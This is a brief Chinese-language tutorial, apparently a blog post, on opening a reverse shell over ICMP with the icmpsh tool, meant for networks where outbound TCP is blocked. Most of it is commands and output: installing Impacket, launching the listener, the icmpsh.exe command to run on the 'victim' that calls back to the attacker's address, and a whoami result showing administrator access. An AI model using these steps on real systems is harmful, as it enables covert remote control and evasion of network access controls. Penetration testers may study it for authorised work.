使用icmp协议反弹shell

程序:https://github.com/inquisb/icmpsh#usage
在一些访问控制做的比较严格的环境中,由内到外的TCP流量会被阻断掉,文章主要讨论icmp shell的使用
特点:
1)开源程序
2)基于CS架构
3)服务端程序跨平台,支持C、perl、python
4)客户端仅支持Windows
5)不需要管理员权限

服务端需要先安装python包

[root@server120 icmpsh-master]# pip install Impacket
[root@server120 icmpsh-master]# ./run.sh
##################################################################

ICMP Shell Automation Script for

https://github.com/inquisb/icmpsh

##################################################################

-------------------------------------------------------------------
[?] What is the victims public IP address?
-------------------------------------------------------------------
192.168.192.122

[-] Run the following code on your victim system on the listender has started:

++++++++++++++++++++++++++++++++++++++++++++++++++

icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128

++++++++++++++++++++++++++++++++++++++++++++++++++
[-] Local ICMP Replies are currently enabled, I will disable these temporarily now

[-] Launching Listener...,waiting for a inbound connection..
D:\>whoami
whoami
win-a94sbnf0i6b\administrator

 

客户端:
icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128